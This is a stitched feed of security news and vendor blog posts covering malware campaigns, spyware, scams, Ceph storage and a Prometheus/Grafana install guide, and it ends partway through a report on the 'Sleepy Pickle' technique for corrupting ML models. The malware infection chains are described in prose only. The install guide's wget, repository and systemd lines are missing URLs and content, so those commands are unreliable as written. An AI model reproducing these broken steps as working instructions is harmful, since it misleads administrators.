Saturday, June 15, 2024

Grandoreiro Banking Trojan Hits Brazil as Smishing Scams Surge in Pakistan

Pakistan has become the latest target of a threat actor called the Smishing Triad, marking the first expansion of its footprint beyond the E.U., Saudi Arabia, the U.A.E., and the U.S.

"The group's latest tactic involves sending malicious messages on behalf of Pakistan Post to customers of mobile carriers via iMessage and SMS," Resecurity said in a report published earlier this week. "The goal is to steal their personal and financial information."

The threat actors, believed to be Chinese-speaking, are known to leverage stolen databases sold on the dark web to send bogus SMS messages, enticing recipients into clicking on links under the pretext of informing them of a failed package delivery and urging them to update their address.

Users who end up clicking on the URLs are directed to fake websites that prompt them to enter their financial information as part of a supposed service fee charged for redelivery.

"Besides Pakistan Post, the group was also involved in detecting multiple fake delivery package scams," Resecurity said. "These scams primarily targeted individuals who were expecting legitimate packages from reputable courier services such as TCS, Leopard, and FedEx."

The development comes as Google revealed details of a threat actor it calls PINEAPPLE that employs tax and finance-themed lures in spam messages to entice Brazilian users into opening malicious links or files that ultimately lead to the deployment of the Astaroth (aka Guildma) information-stealing malware.

"PINEAPPLE often abuses legitimate cloud services in their attempts to distribute malware to users in Brazil," Google's Mandiant and Threat Analysis Group (TAG) said. "The group has experimented with a number of cloud platforms, including Google Cloud, Amazon AWS, Microsoft Azure and others."

It's worth noting that the abuse of Google Cloud Run to disseminate Astaroth was flagged by Cisco Talos earlier this February, describing it as a high-volume malware distribution campaign targeting users across Latin America (LATAM) and Europe.

The internet goliath said it also observed a Brazil-based threat cluster it tracks as UNC5176 targeting financial services, healthcare, retail, and hospitality sectors with a backdoor codenamed URSA that can siphon login credentials for various banks, cryptocurrency websites, and email clients.

The attacks leverage emails and malvertising campaigns as distribution vectors for a ZIP file containing an HTML Application (HTA) file that, when opened, drops a Visual Basic Script (VBS) responsible for contacting a remote server and fetching a second-stage VBS file.

The downloaded VBS file subsequently proceeds to carry out a series of anti-sandbox and anti-VM checks, after which it initiates communications with a command-and-control (C2) server to retrieve and execute the URSA payload.

A third Latin America-based financially motivated actor spotlighted by Google is FLUXROOT, which is linked to the distribution of the Grandoreiro banking trojan. The company said it took down phishing pages hosted by the adversary in 2023 on Google Cloud that impersonated Mercado Pago with the goal of stealing users' credentials.

"More recently, FLUXROOT has continued distribution of Grandoreiro, using cloud services such as Azure and Dropbox to serve the malware," it said.

The disclosure follows the emergence of a new threat actor dubbed Red Akodon that has been spotted propagating various remote access trojans like AsyncRAT, Quasar RAT, Remcos RAT, and XWorm through phishing messages that are designed to harvest bank account details, email accounts, and other credentials.

Targets of the campaign, which has been ongoing since April 2024, include government, health, and education organizations as well as financial, manufacturing, food, services, and transportation industries in Colombia.

"Red Akodon's initial access vector occurs mainly using phishing emails, which are used as a pretext for alleged lawsuits and judicial summonses, apparently coming from Colombian institutions such as the Fiscalía General de la Nación and Juzgado 06 civil del circuito de Bogotá," Mexican cybersecurity firm Scitum said.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News

Friday, June 14, 2024

TNSR Prometheus Exporter with A Grafana Dashboard Visualization


Prometheus is a powerful and flexible toolkit for monitoring and alerting, designed to handle modern, highly dynamic environments easily. Its ability to efficiently collect, store, and query time-series data and robust alerting and visualization capabilities make it a popular choice for infrastructure and application monitoring. Its extensibility and integration with other tools like Grafana further enhance its utility in diverse monitoring scenarios. Prometheus is not a direct successor to SNMP but an addition that brings powerful capabilities for modern monitoring needs. 


Prometheus is widely used across various industries due to its flexibility, scalability, and powerful capabilities in monitoring and alerting. TNSR customers that require real-time insights into their network infrastructure, need to ensure high availability, and want to automate their incident response processes typically benefit the most from Prometheus. Its ability to integrate with modern cloud-native environments and its extensive ecosystem make it a critical tool for DevOps, SRE (Site Reliability Engineering), and IT operations teams.

How It Works

  • The Prometheus Exporter needs to be enabled on TNSR by following this procedure. TNSR includes a Prometheus exporter which supports statistical data from the dataplane (VPP) only. Once enabled, the service listens for connections on TCP port 9482 and can be accessed on http://<IP address>/metrics. 
  • The Prometheus server (running separately on a dedicated server) queries metrics and stores them in the database.
  • The Grafana server uses the Prometheus database as a data source. This involves specifying the URL of the Prometheus server in Grafana.
  • Users create dashboards in Grafana, adding panels and using PromQL queries to fetch data from Prometheus, or download ready-to-use dashboards from the Grafana website, such as this dashboard.

Deployment Guide

High-level Steps

  • Enable Prometheus on TNSR
  • Install and configure Prometheus on the Ubuntu server
  • Install and configure Grafana on the Ubuntu server
  • Grafana Dashboard

In this deployment scenario, we are going to use a single server for Prometheus and Grafana, but it is recommended to have dedicated servers in production. Prometheus and Grafana will be installed on an Ubuntu server. Please refer to the Prometheus and Grafana documentation to see what options are available.

Enable Prometheus on TNSR

For a detailed explanation and possible configuration options, please refer to the Netgate documentation here. To enable Prometheus on TNSR, you only need to run a single command:

ubuntu$ prometheus host enable

Apply filters if required. For example, to filter only interfaces data you can run:

ubuntu$ prometheus host filter interfaces

Applying filters may be helpful if you have a busy configuration on TNSR, especially if you are running BGP with the full internet table. This may generate a large amount of traffic to your Prometheus server.

Install and Configure Prometheus on the Ubuntu Server

There are multiple ways to install Prometheus; we followed this article

  • Create a System User for Prometheus

ubuntu$ sudo groupadd --system prometheus

ubuntu$ sudo useradd -s /sbin/nologin --system -g prometheus prometheus

  • Create Directories for Prometheus

ubuntu$ sudo mkdir /etc/prometheus

ubuntu$ sudo mkdir /var/lib/prometheus

  • Download Prometheus and Extract Files

To download the latest update, go to the Prometheus Official Downloads site and copy the download link.

ubuntu$ wget

ubuntu$ tar vxf prometheus*.tar.gz

  • Navigate to the Prometheus Directory

ubuntu$ cd prometheus*/

  • Move the Binary Files & Set Owner

ubuntu$ sudo mv prometheus /usr/local/bin

ubuntu$ sudo mv promtool /usr/local/bin

ubuntu$ sudo chown prometheus:prometheus /usr/local/bin/prometheus

ubuntu$ sudo chown prometheus:prometheus /usr/local/bin/promtool

  • Move the Configuration Files & Set Owner

ubuntu$ sudo mv consoles /etc/prometheus

ubuntu$ sudo mv console_libraries /etc/prometheus

ubuntu$ sudo mv prometheus.yml /etc/prometheus

ubuntu$ sudo chown prometheus:prometheus /etc/prometheus

ubuntu$ sudo chown -R prometheus:prometheus /etc/prometheus/consoles

ubuntu$ sudo chown -R prometheus:prometheus /etc/prometheus/console_libraries

ubuntu$ sudo chown -R prometheus:prometheus /var/lib/prometheus

Update target IP address in prometheus configuration file:

ubuntu$ sudo nano /etc/prometheus/prometheus.yml

  • Create Prometheus Systemd Service

Now, you need to create a system service file for Prometheus. Create and open a prometheus.service file with the Nano text editor using:

ubuntu$ sudo nano /etc/systemd/system/prometheus.service

Include these settings to the file, save, and exit:








ExecStart=/usr/local/bin/prometheus \

    --config.file /etc/prometheus/prometheus.yml \

    --storage.tsdb.path /var/lib/prometheus/ \

    --web.console.templates=/etc/prometheus/consoles \




ubuntu$ sudo systemctl daemon-reload

  • Start Prometheus Service and check status

ubuntu$ sudo systemctl enable prometheus

ubuntu$ sudo systemctl start prometheus

ubuntu$ sudo systemctl status prometheus

Now you should have your Prometheus server up and running. You can access it via http://<server-ip>:9090/

To verify that Prometheus can successfully pull metrics from TNSR, please go to Status > Targets. You should see your TNSR in the Endpoint column with the Green Status UP.

Install and Configure Grafana on the Ubuntu Server

For the Grafana installation, we used this procedure.

  • Install the prerequisite packages:

ubuntu$ sudo apt-get install -y apt-transport-https software-properties-common wget

ubuntu$ sudo mkdir -p /etc/apt/keyrings/

ubuntu$ wget -q -O - | gpg --dearmor | sudo tee /etc/apt/keyrings/grafana.gpg > /dev/null

  • To add a repository for stable releases, run the following command:

ubuntu$ echo "deb [signed-by=/etc/apt/keyrings/grafana.gpg] stable main" | sudo tee -a /etc/apt/sources.list.d/grafana.list

  • Run the following command to update the list of available packages:

# Updates the list of available packages

ubuntu$ sudo apt-get update

  • To install Grafana OSS, run the following command:

# Installs the latest OSS release:

ubuntu$ sudo apt-get install grafana

After the above steps your Grafana server should be accessible on http://<server-ip>:3000/ using default username and password admin/admin. It is recommended to update your password after first login.

Once in the Grafana Home Page please follow Connections > Data Source and type “Prometheus” in the search field to add your first Data Source, in our case - Prometheus Server. 

Type the name for your Data Source and http://localhost:9090 in the Connections URL field. This should be enough for your Data Source configuration. 

Scroll down and click Save & Exit. You should see the below message that Grafana has successfully queried the Prometheus API.

Grafana Dashboard

The next step is to create your Dashboard. For this, you need to go to the Dashboard menu where you will have a couple of options. You can create it manually or import a dashboard pre-built by the community.

Pre-built Grafana Dashboards can be found on the Grafana website:

We recommend using this VPP Dashboard: You can download this Dashboard and import it by clicking the Import button in the Dashboard menu. Please note that this Dashboard requires VPP 24.02, which is available on TNSR Release 24.06. Although this Dashboard will work with an older version, some graphs which require VPP 24.02 won’t be displayed correctly. This is how the VPP Performance Details Dashboard panel looks once installed. It can be accessed in Dashboards. 

At the top of the dashboard, you will find a list of your instances and interfaces which you can browse.

By selecting a specific interface, you will see graphs only for this interface


Using Prometheus on a TNSR router enhances network monitoring by providing detailed, scalable, and customizable metrics collection and analysis. The integration with Grafana further enriches the monitoring experience through advanced visualization capabilities. This combination allows network administrators to gain deep insights, proactively manage network health, and efficiently respond to potential issues, while benefiting from open-source tools' flexibility and extensibility.

from Blog

Google's Privacy Sandbox Accused of User Tracking by Austrian Non-Profit

Jun 14, 2024NewsroomPrivacy / Ad Tracking

Google's plans to deprecate third-party tracking cookies in its Chrome web browser with Privacy Sandbox has run into fresh trouble after Austrian privacy non-profit noyb (none of your business) said the feature can still be used to track users.

"While the so-called 'Privacy Sandbox' is advertised as an improvement over extremely invasive third-party tracking, the tracking is now simply done within the browser by Google itself," noyb said.

"To do this, the company theoretically needs the same informed consent from users. Instead, Google is tricking people by pretending to 'Turn on an ad privacy feature.'"

In other words, by making users agree to enable a privacy feature, they are still being tracked by consenting to Google's first-party ad tracking, the Vienna-based non-profit founded by activist Max Schrems alleged in a complaint filed with the Austrian data protection authority.

Privacy Sandbox is a set of proposals put forth by the internet giant that aims to block covert tracking techniques and limit data sharing with third-parties while allowing website publishers to serve tailored ads.

However, its plans to deprecate third-party cookies in Chrome have been repeatedly delayed as it works towards addressing concerns and feedback raised by regulators and developers. Back in April, the company said it intends to phase out third-party cookies early next year.

In the interim, Google is ramping up testing efforts, with the company already deprecating third-party cookies for 1% of Chrome users globally starting the first quarter of 2024.

While users have the option to agree to disagree to tracking in this manner, noyb has accused the company of using dark patterns to increase consent rates and misleadingly passing it off as a feature that protects users ad tracking.

Noyb further argued that Privacy Sandbox being less invasive than third-party cookie tracking mechanisms does not give Google the right to violate data protection laws in the region.

"Consent has to be informed, transparent, and fair to be legal. Google has done the exact opposite," noyb's founder Max Schems said. "If you merely steal less money from people than another thief, you can't call yourself a 'wealth protection agent.' But that is basically what Google is doing here."

Google, in a statement shared with Reuters, said Privacy Sandbox offers "meaningful privacy improvement" existing technologies, and that it will work towards arriving at a "balanced outcome" that meets the needs of all stakeholders.

This is not the first time Noyb has filed complaints with the European Union watchdogs against big tech companies for alleged privacy infringements.

Earlier this April, it accused ChatGPT maker OpenAI of violating General Data Protection Regulation (GDPR) laws by "hallucinating" false information about individuals.

It has also criticized Meta for relying on "Legitimate Interests" over its plans to utilize publicly shared data of its users -- with the exception of private messages with friends and family or from accounts of Europeans under age 18 -- to train and develop unspecified artificial technologies.

The social media company has since responded stating the AI models it develops "need to be trained on relevant information that reflects the diverse languages, geography, and cultural references of the people in Europe who will use them."

It further said other companies including Google and OpenAI have already used data from European users to train their AI models, noting its approach is "more transparent and offers easier controls than many of our industry counterparts already training their models on similar publicly available information."

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News

What is Ceph and Ceph Storage?

As data storage demands grow exponentially, finding scalable and resilient storage solutions becomes crucial. Enterprises require robust systems that can manage vast amounts of data efficiently while ensuring high availability and reliability. Enter Ceph: a standout contender in the world of distributed storage systems, known for its impressive scalability.

What is Ceph?

Ceph is an open-source software-defined storage solution designed to provide block, file, and object storage access from a single system. It’s built to be self-healing and self-managing, which is aimed to reduce the costs and complexity of maintaining the storage infrastructure. Ceph software can run on most commodity hardware, while it’s distributed architecture is highly scalable, up to exabyte level.

Ceph was created by Sage Weil during his doctoral research at the University of California, Santa Cruz. The project started in 2004, and by 2006, Ceph was already available under an open-source license. Ceph architecture


Figure 1: Ceph architecture

How Does Ceph Work?

Though Ceph can be configured to run from a single server, it’s not how it is supposed to work. For the feasible production-ready deployment, Ceph requires the minimum of 3 servers that are connected to one another in what is called a cluster. Each connected server within that cluster network is referred to as a node.

Ceph Components

Ceph uses a distributed architecture with five key components (daemons), which can all run on the same set of cluster nodes, and which all have their distinct roles. This design allows for direct interaction with these components, creating a flexible and resilient storage architecture. The key daemons in Ceph cluster are:

Ceph monitors (ceph-mon): Monitor the status of individual nodes in the cluster, including the managers (MGR), object storage devices (OSD), and metadata servers (MDS). To ensure maximum reliability, it is recommended to have at least 3 monitor nodes.

Ceph managers (ceph-mgr): Manage the status of storage usage, system load, and node capacity. Running alongside the monitor daemons, managers also provide additional monitoring capabilities and interfaces for external management systems.

Metadata servers (ceph-mds): Store metadata, including storage paths, file names, and timestamps of files for its CephFS filesystem.

Object storage devices (ceph-osd): Manage actual data, handling data storage, replication and restoration. A minimum of 3 OSDs is recommended for a production cluster.

RESTful gateways (ceph-rgw): Expose the object storage layer as HTTP interface compatible with Amazon S3 and OpenStack Swift REST APIs.

Ceph Storage Operating Principles

Ceph distributes data across multiple nodes using the CRUSH (Controlled Replication Under Scalable Hashing) algorithm, which manages data replication and placement within the cluster. Here’s how it works:

Data placement and replication: The CRUSH algorithm distributes files in a pseudo-random manner, meaning that first, CRUSH actually selects the optimal storage locations based on predefined criteria, and then files are duplicated and stored on physically separate media according to replication parameters specified by system administrator. Files are organized into placement groups (PGs), and their names are processed as hash values.

Data retrieval: To read data, Ceph uses an allocation table called the CRUSH Map to locate an OSD containing the requested file.

Self-healing: If a node fails, Ceph automatically redistributes the data to other healthy nodes and restores the initial number of data copies.

Such an approach ensures that Ceph can handle large amounts of data while providing high availability and performance.

Ceph Storage Types and Protocols

Ceph supports various storage types, making it a versatile solution for different storage needs. The primary storage types include:

Object Storage

Ceph provides object storage through its RADOS (Reliable Autonomic Distributed Object Store) layer. RADOS is a scalable object store that handles data storage, retrieval, and replication across the cluster. It allows applications to interact with data using RESTful APIs, such as S3 and SWIFT.

Block Storage

Ceph’s RADOS Block Device (RBD) provides block storage access, enabling the creation of virtual disk images that can be attached to virtual machines. This makes Ceph suitable for cloud and virtualization environments where scalable and resilient block storage is required.

File Storage

Ceph also offers file storage through CephFS, which provides a POSIX-compliant file system. CephFS allows users to store and retrieve files hierarchically, similar to traditional file systems, but with the added benefits of Ceph’s distributed architecture.

Benefits and Challenges of Ceph


Ceph offers numerous benefits, making it a preferred choice for many organizations:

Free software: Ceph is a free and open-source platform with extensive online resources available for setup and maintenance. RedHat’s acquisition of Ceph ensures its continued development in the foreseeable future.

Enormous scalability: Ceph scales to exabytes levels meeting even the largest storage capacity demands.

Self-healing: When properly configured and maintained, Ceph provides excellent data protection and self-healing capabilities ensuring data integrity and continuous availability.


However, implementing Ceph comes with its own set of challenges:

Complexity: A proper Ceph cluster setup and effective maintenance includes a steep learning curve that could be overwhelming even for skilled IT administrators without the relevant experience.

Limited performance: Ceph is sort of a “one-trick pony” in terms of storage performance. It deals perfectly with objects and large sequential data blocks (64K and more) but falls behind other competitive solutions when it comes to small-sized random or mixed workloads (4K, 8K) that are common in most virtualization use cases. Additionally, optimizing Ceph for specific workloads requires extensive performance tuning and experience.

Resource intensive: Ceph is designed for large deployments and truly begins to shine with 4, preferably 5 nodes, which is not ideal for small and medium-sized businesses. This can be somewhat mitigated with all-NVMe configurations, making a 3-node cluster a feasible option.

Ceph vs. StarWind Virtual SAN

In the world of data storage, choosing the right solution can make all the difference. Ceph and StarWind Virtual SAN (VSAN) are two prominent contenders, each with unique strengths and capabilities. When comparing Ceph with StarWind Virtual SAN (VSAN), several distinctions become evident:

Feature Ceph StarWind VSAN
Storage Types Object, Block, File Block, File
Scalability High Moderate
Hardware footprint High (3 nodes minimum, 4 or more nodes recommended, depends on storage type) Low (2 nodes minimum for a production-ready highly-available (HA) configuration)
Licensing Open source, with optional paid support Commercial, Free version with limited support is available
Ease of Setup Complex Easy to setup, installation assistance service is included in price
Performance Moderate (varies by workload) High (higher performance in most virtualization use cases)

While Ceph provides a versatile and scalable solution, StarWind VSAN offers much more impressive performance, particularly for virtual machine storage use cases. For a detailed comparison of these and other prominent solutions, refer to the “DRBD/LINSTOR vs Ceph vs StarWind VSAN: Proxmox HCI Performance Comparison” article.


What does Ceph stand for?

Ceph stands for “Cephalopod,” inspired by intelligent marine animals known for their distributed nervous system, reflecting Ceph’s distributed architecture.

What is the function of Ceph?

Ceph decouples data from physical storage hardware through software abstraction layers, providing impressive scalability and fault management. This makes Ceph great for large private cloud environments, OpenStack, Kubernetes, and other container-based workloads.

What is the difference between NFS and Ceph?

NFS (Network File System) is a protocol that allows file access over a network, typically used for simple file sharing. Ceph, on the other hand, offers a more comprehensive and scalable storage solution with support for high availability, object, block, and file storage, making it suitable for more demanding and diverse storage needs. You can use CephFS namespaces with the NFS-Ganesha server to export them over the NFS protocol. This allows you to run multiple NFS instances with RADOS Gateway (RGW), exporting the same or different resources from the Ceph cluster. This way, you get the ease of NFS with the strength and scalability of Ceph.

from StarWind Blog

The Good, the Bad and the Ugly in Cybersecurity – Week 24

The Good | Ukrainian Police Arrest Cryptor Specialist Helping Conti & LockBit Ransomware Operations

A Russian national was arrested this week for allegedly working with Conti and LockBit ransomware groups, helping to make their malware undetectable and also conducting at least one attack himself. Ukrainian cyber police apprehended the 28-year-old man in Kyiv during Operation Endgame, a major operation carried out two weeks ago to dismantle an extensive ecosystem of malware droppers.

(Source: Cyber Police of Ukraine)

According to Ukrainian law enforcement, the arrested had expertise in developing custom crypters that encrypted and obfuscated ransomware payloads into what looked like innocuous files. This made them fully undetectable (FUD) to legacy antivirus software. His services were sold to both Conti and LockBit syndicates, which bolstered their success rates in infiltrating networks.

Reports from Dutch police confirm that the man orchestrated at least one of his own attacks using a Conti payload in 2021, indicating his involvement as an affiliate and goals to gain maximum profits from the relationship. His arrest includes seizure of computer equipment, mobile phones, and handwritten notes, all being held for ongoing examination. As it stands, the Russian suspect has already been charged under Part 5 of Article 361 of the Criminal Code of Ukraine for unauthorized interference with information systems. He faces up to 15 years in prison.

This arrest is the latest in a string of actions against LockBit operations, most recently following the distribution of 7000 decryption keys to all affected victims of the Ransomware-as-a-Service (RaaS). Earlier last month, the DoJ unveiled the identity of LockBit’s developer, placing a reward up to $10 million for his arrest or conviction.

The Bad | Hamas-Linked Threat Group Spies on Android Users In Egypt & Palestine

An espionage-focused threat actor known as Arid Viper has been linked to an ongoing mobile-based campaign, involving trojanized Android apps delivering ‘AridSpy’ spyware. Based on a recent report, the Hamas-aligned actor is distributing malware through websites that mimic legitimate messaging, job search, and civil registry applications.

Arid Viper’s latest appearance is marked by a new version of AridSpy – a multi-stage trojan capable of downloading additional payloads from a command-and-control (C2) server. The attacks are primarily targeting users in Palestine and Egypt through websites that distribute the fake (but functional) apps. The apps themselves are clones of legitimate services, but with malicious features.

(Source: WeLiveSecurity)

In one case, researchers found a website impersonating a Palestinian Civil Registry which had a nearly 200-person following on its dedicated Facebook page. While the app on this site is not a direct clone of the legitimate version found on Google Play Store, it communicates with its legitimate server, indicating a high level of sophistication by Arid Viper.

The actor is also responsible for registering a fake job opportunity app which, upon install, downloads a first-stage payload posing as a Google Play Services update. The spyware then executes various commands, including taking pictures with the front camera when specific conditions are met and sending the data to the actor’s C2 server.

Arid Viper continues to cause concern due to its consistent use and development of mobile spyware to target military personnel in the Middle East as well as journalists and political dissidents. Organizations in critical infrastructures guarding high-value intel can mitigate the threat of cyber espionage by implementing proactive and AI-enhanced threat detection, advanced response capabilities, and deep visibility across networks.

The Ugly | Multi-Platform Malware Campaign Targets Indian Critical Sectors via RATs

Cyber researchers have uncovered a six-year-long threat campaign, dubbed ‘Operation Celestial Force’, that employs a combination of GravityRAT, an Android-based malware, and HeavyLift, a Windows-based malware loader. Their report ties Pakistani threat group Cosmic Leopard (aka SpaceCobra) to the campaign with high confidence.

Most recent activity in the operation shows a defined expansion and evolution in the malware suite being used, suggesting ongoing success of the campaign in targeting users in the Indian subcontinent. The operation leverages both Gravity RAT and HeavyLift which are simultaneously managed through another standalone tool called ‘GravityAdmin’.

Though GravityRAT was originally a Windows-based malware deployed via spear phishing emails, it has since been adapted for Android systems as well. The Android version of the tool has now been observed in attacks against the Indian military and Pakistani Air Force personnel by masquerading as cloud storage, entertainment, and chat apps. The HeavyLift malware loader is shipped as an Electron app and targets Windows, macOS and Linux.

HeavyLift code targeting macOS
HeavyLift code targeting macOS

Cosmic Leopard commonly uses spear phishing and social engineering tactics to gain the trust of their victims. After being directed to visit malicious sites, victims are lured into downloading benign-looking programs that then deploy either GravityRAT or HeavyLift depending on the OS in question. The GravityAdmin binary has been used to control the compromised systems since at least August 2021 and works by managing connections with GravityRAT and HeavyLift’s C2 servers.

Researchers posit that the long-running operation will continue to harvest sensitive information from users in the Indian defense, government, and technology sectors, making it crucial for these organizations to shore up their data encryption and monitoring, real-time monitoring, and automated response capabilities.

from SentinelOne

Euro 2024: Common cyberthreats | Kaspersky official blog

Fraudsters love hype and all-things-trending. Ah, so Toncoin is becoming very popular? Let’s build a cryptocurrency pyramid scheme. Artificial intelligence has hit the next level? Perfect for making voice deepfakes. The Euros have started? Get ready for a month of soccer scams…

The UEFA Euro 2024 tournament will gather over 2.7 million people in stadiums, and another 12 million in fan zones across Germany, while the total number of folks who’ll be following the year’s biggest soccer tournament boggles the mind. Alas, many of these spectators and viewers could make easy targets for scammers. That’s why it’s important to take the right precautions, understand the potential cyberthreats in the soccer world, and learn how to watch your favorite team’s matches safely.

Fake tickets

A typical threat before any major offline event is ticket fraud. In short: buy tickets only from the official UEFA website, or at the stadium box office – not from third parties or any other websites.

What could go wrong otherwise? Here are a few common scenarios:

  • Payment data compromise. This can happen if you pay by card on a fake (phishing) website. So before attempting to buy a ticket online, make sure there are no typos in the website’s address and that the domain wasn’t registered just a couple of weeks ago.
  • Personal data compromise. This scenario is also possible when buying from a phishing site — fraudsters may ask for not just your bank details but also your name, address, phone number and email. Be cautious if buying tickets requires an unusual amount of personal data.
  • Malware downloads. Fraudsters may offer to sell Euro 2024 tickets via a “special app”. This seemingly harmless app could turn out to be a stealer, miner, or something even worse. If you come across an offer to “download this app to buy tickets”, ignore it — it’s a scam.

All these scenarios have the same potential outcome — no tickets actually purchased, financial loss, and a very grumpy mood. If you want to make sure your data hasn’t already been compromised, install Kaspersky Premium — it will protect your devices from viruses, keep you safe from phishing and malicious links while surfing the web, and automatically check for data leaks from your accounts tied to email and phone numbers.

Pirate streams

Even if you plan on watching the entire tournament online — remain vigilant. Some attractively priced streaming services may turn out to be pirated, and a subscription that seems like a great deal could empty your bank account.

The risks here are the same as with tickets — payment and personal data can be stolen, and malicious scripts can be embedded in the streaming site pages, allowing attackers to control your browser and system. That’s why we don’t recommend storing passwords in your browser — use a password manager.

Pirate streaming service for watching Euro Cup matches

Pirate streaming service for watching Euro Cup matches

Illegal betting

Another popular type of soccer fraud is betting with illegal, fraudulent bookmakers offering fantastic odds. These outfits lure gamblers with attractive odds, and then disappear within a couple of weeks. As a result, the fans lose their money and, yet again, their payment data ends up in grubby hands. If you want to place a bet on a soccer match, use the official website or app of a bookmaker licensed to operate in your country.

Fake stores

Any soccer tournament involving national teams inevitably causes a surge in the popularity of stores selling fan merchandise: jerseys, scarves, T-shirts and so on. Among the plethora of such shops, it’s best to choose official or offline stores — that way you won’t get scammed.

Fake store selling soccer paraphernalia

Fake store selling soccer paraphernalia

Fraudsters attract buyers with big discounts, low prices and free shipping, but in reality, these are classic scammer scenarios: without reliable protection, your payment and personal data can be stolen and you’ll never receive your favorite team’s jersey.


  • Watch soccer matches only on official channels/sites and don’t pay distributors of pirated content.
  • Use reliable protection that warns you when you’re about to visit a phishing site.
  • Pay using a virtual card with a set limit. Before purchasing a ticket or subscription, transfer only the amount needed for that one transaction. This way, fraudsters won’t be able to get their hands on anything extra.
  • Don’t buy tickets on the second-hand market— such tickets may be invalidated by UEFA. It’s better to use the organization’s official website.
  • Buy fan merchandise only from official stores— otherwise you risk encountering fraudsters.

from Kaspersky official blog

Learn to Secure Petabyte-Scale Data in a Webinar with Industry Titans

Jun 14, 2024The Hacker News

Data is growing faster than ever. Remember when petabytes (that's 1,000,000 gigabytes!) were only for tech giants? Well, that's so last decade! Today, businesses of all sizes are swimming in petabytes.

But this isn't just about storage anymore. This data is ALIVE—it's constantly accessed, analyzed, shared, and even used to train the next wave of AI.

This creates a huge challenge: how do you secure such a vast, ever-changing landscape?

That's why we've brought together a powerhouse panel of industry experts who have not only faced these challenges but conquered them.

Join us for an exclusive webinar, "Data Security at the Petabyte Scale," and gain insights from the best in the field:

  • Shaun Marion: Former CISO of McDonald's, a global brand with data security demands on a massive scale.
  • Robert Bigman: Former CISO at the CIA, where protecting classified information at the highest levels is paramount.
  • Asaf Kochan: Former head of Unit 8200 (Israel's elite cyber intelligence unit) and Co-Founder and President of Sentra, a leading data security platform.
  • Swathi Joshi: VP, SaaS Cloud Security at Oracle, a veteran in safeguarding data across diverse cloud environments.

In this must-attend webinar, you'll learn:

  • How to adapt your data security strategies to keep pace with explosive data growth
  • Best practices for managing access control and monitoring in petabyte-scale environments
  • Strategies for mitigating risks associated with third-party data access and data movement
  • Insights into the unique security challenges posed by LLM model training
  • Future-proofing your data security approach for the era of big data

Whether you're a CISO, security engineer, IT professional, or business leader, if you're responsible for protecting your company's data, this webinar is essential. Secure your place in this exclusive webinar and be part of the future of data security.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News

Why Regulated Industries are Turning to Military-Grade Cyber Defenses

Jun 14, 2024The Hacker NewsCybersecurity / Regulatory Compliance

As cyber threats loom large and data breaches continue to pose increasingly significant risks. Organizations and industries that handle sensitive information and valuable assets make prime targets for cybercriminals seeking financial gain or strategic advantage.

Which is why many highly regulated sectors, from finance to utilities, are turning to military-grade cyber defenses to safeguard their operations.

Regulatory Pressures Impacting Cyber Decisions

Industries such as finance, healthcare, and government are subject to strict regulatory standards, governing data privacy, security, and compliance. Non-compliance with these regulations can result in severe penalties, legal repercussions, and damage to reputation. To meet regulatory requirements and mitigate the ever-increasing risk, organizations are shifting to adopt more robust cybersecurity measures.

Understanding the Increase of Threats

Attacks on regulated industries have increased dramatically over the past 5 years, with organizations being bombarded with constant threats daily. Military cyber defenses leverage threat intelligence capabilities to identify and neutralize cyber threats effectively. By harnessing real-time data analytics, machine learning algorithms, and predictive modeling, these defenses don't just detect anomalies they prevent potential breaches before they occur. Regulated industries are increasingly investing in similar technologies to enhance their threat protection and response capabilities.

For example, technologies such as Content Disarm and Reconstruction (CDR) move beyond outdated detection solutions. By assuming that all incoming data is potentially malicious and can't be trusted. Everfox CDR works by extracting only the valid business information from files (either discarding or storing the originals), verifying the extracted information is well-structured, and then building new, fully functional files to carry the information to its destination. It's a game-changer for highly regulated industries for mitigating against the threat of even the most advanced zero-day attacks and exploits. Pivoting from detection to prevention in this way is especially important with the recent evolution in hybrid workforces and digital transformation and their resultant usage of content and electronic information everywhere.

As we know however, threats have moved beyond being external only. Insider Risk Programs are a critical component of any holistic cybersecurity strategy, addressing vulnerabilities that may not be as visible as external threats. Sometimes the biggest risk to your data can come from within.

Collaboration and Information Sharing:

Collaboration between military and private-sector organizations is becoming increasingly common. Regulated industries are leveraging partnerships with government agencies, defense contractors, and cybersecurity experts to gain access to cutting-edge technologies, threat intelligence, and best practices. By sharing information and expertise, vital industries can strengthen their cyber defenses, protect their data and stay ahead of emerging threats.

Mitigating Insider Cyber Risks:

By implementing robust internal security measures, organizations can further protect sensitive data and safeguard critical infrastructure. Implementing solutions such as, Insider Risk security, industries can better protect sensitive data, maintain compliance and fortify defenses against a range of risks.

Everfox Insider Protection Solutions allow you to uncover internal threats before the loss becomes real. Combining visibility and analytics to help industries understand how users interact with critical data and stop risky behaviors "left of loss."

Adopting Military Strategies

Military organizations have long been at the forefront of cybersecurity advancements. Developing sophisticated defense mechanisms needed to protect national security interests. With increasing threat levels and consequences, regulated industries are now recognizing the value of adopting military-inspired strategies and technologies to defend their own networks. Military cyber defenses such as Cross Domain Solutions, emphasize proactive threat prevention rather than a reliance on detection, rapid response capabilities, and layered security protocols, all of which are essential in combating modern cyber threats.

In an era defined by escalating cyber threats and stringent regulatory landscapes, industries and organizations are increasingly turning to military-grade cyber defenses to fortify their security posture. By embracing military-inspired strategies, technologies, and partnerships, organizations can enhance their resilience against cyber threats, mitigate risks, and uphold regulatory compliance. The integration of military cyber defenses will prove essential in safeguarding critical assets and preserving the integrity of regulated industries.

Note: This article was expertly contributed by Daniel Feaver. He specializes in designing and delivering cross-domain solutions for the UK Government and Defense, enhancing connectivity between previously unconnectable networks.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News

Thursday, June 13, 2024

New Attack Technique 'Sleepy Pickle' Targets Machine Learning Models

Jun 13, 2024NewsroomVulnerability / Software Security

The security risks posed by the Pickle format have once again come to the fore with the discovery of a new "hybrid machine learning (ML) model exploitation technique" dubbed Sleepy Pickle.

The attack method, per Trail of Bits, weaponizes the ubiquitous format used to package and distribute machine learning (ML) models to corrupt the model itself, posing a severe supply chain risk to an organization's downstream customers.

"Sleepy Pickle is a stealthy and novel attack technique that targets the ML model itself rather than the underlying system," security researcher Boyan Milanov said.

